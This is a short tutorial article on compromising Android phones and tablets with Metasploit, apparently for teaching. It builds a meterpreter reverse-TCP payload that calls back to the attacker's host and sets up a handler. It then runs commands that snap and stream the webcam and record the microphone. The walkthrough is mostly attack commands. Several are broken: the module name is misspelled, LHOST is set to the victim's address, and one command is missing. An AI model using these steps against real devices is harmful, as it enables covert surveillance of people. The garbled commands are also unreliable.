Exploiting Android with Metasploit
[Back] This article shows how an Android device can be compromised using Metasploit. The devices used as a Samsung S 8.4 tablet and an HTC M8 One smart phone, and the attacker uses a reverse TCP connection to make a call-back to the attacking host. In this case the attacking host is at 192.168.0.24, and the Android devices are at 192.168.0.9 (Samsung) and 192.168.0.10 (HTC M8).
Creating the Vulnerability
The vulnerability will create a call-back from the Android device to Metasploit. So if the attacking host is at 192.168.0.24, and we callback on port 443, then we create the exploit with:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=443
Next we would save this to a shared folder (such as on Dropbox) and then install it on the device, otherwise it could be downloaded over the Internet.
Once the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run:
and then setup a handler for the exploit:
msf> use exploit/multi/hander
Next we define the payload for the exploit:
msf exploit> set payload android/meterpreter/reverse_tcp
Finally we set the host connection details with the Samsung device with:
msf exploit (handler) > set LHOST 192.168.0.9 msf exploit (handler) > set LPORt 443 msf exploit (handler) > exploit
This then waits for a connection to the device, and once connected, Metasploit has a connection into the Android device:
The commands used are then:
meterpreter > webcam_list 1 - Back Camera 2 - Front Camera meterpreter > webcam_snap 1 meterpreter > webcam_stream 1 meterpreter > record_mic -d 5
This article shows how an intruder can gain access to an Android device remotely, once an exploit has been installed.